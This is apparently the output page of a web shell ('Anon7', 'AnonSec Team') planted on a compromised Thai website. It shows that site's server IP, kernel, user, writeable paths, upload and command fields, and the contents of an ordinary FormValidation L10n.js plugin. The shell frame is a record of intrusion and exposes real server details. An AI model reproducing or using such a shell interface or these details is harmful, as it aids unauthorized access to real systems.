NG1NDEX
Server IP : 150.95.80.236  /  Your IP : 3.144.25.14
Web Server : Apache
System : Linux host-150-95-80-236 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : social-telecare ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/pcu.in.th/uat.pcu.in.th/assets/plugins/formvalidation/dist/amd/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/vhosts/pcu.in.th/uat.pcu.in.th/assets/plugins/formvalidation/dist/amd/plugins/L10n.js
var __extends = (this && this.__extends) || (function () {
    var extendStatics = function (d, b) {
        extendStatics = Object.setPrototypeOf ||
            ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) ||
            function (d, b) { for (var p in b) if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p]; };
        return extendStatics(d, b);
    };
    return function (d, b) {
        if (typeof b !== "function" && b !== null)
            throw new TypeError("Class extends value " + String(b) + " is not a constructor or null");
        extendStatics(d, b);
        function __() { this.constructor = d; }
        d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
    };
})();
define(["require", "exports", "../core/Plugin"], function (require, exports, Plugin_1) {
    "use strict";
    Object.defineProperty(exports, "__esModule", { value: true });
    var L10n = (function (_super) {
        __extends(L10n, _super);
        function L10n(opts) {
            var _this = _super.call(this, opts) || this;
            _this.messageFilter = _this.getMessage.bind(_this);
            return _this;
        }
        L10n.prototype.install = function () {
            this.core.registerFilter('validator-message', this.messageFilter);
        };
        L10n.prototype.uninstall = function () {
            this.core.deregisterFilter('validator-message', this.messageFilter);
        };
        L10n.prototype.getMessage = function (locale, field, validator) {
            if (this.opts[field] && this.opts[field][validator]) {
                var message = this.opts[field][validator];
                var messageType = typeof message;
                if ('object' === messageType && message[locale]) {
                    return message[locale];
                }
                else if ('function' === messageType) {
                    var result = message.apply(this, [field, validator]);
                    return result && result[locale] ? result[locale] : '';
                }
            }
            return '';
        };
        return L10n;
    }(Plugin_1.default));
    exports.default = L10n;
});

Anon7 - 2022
AnonSec Team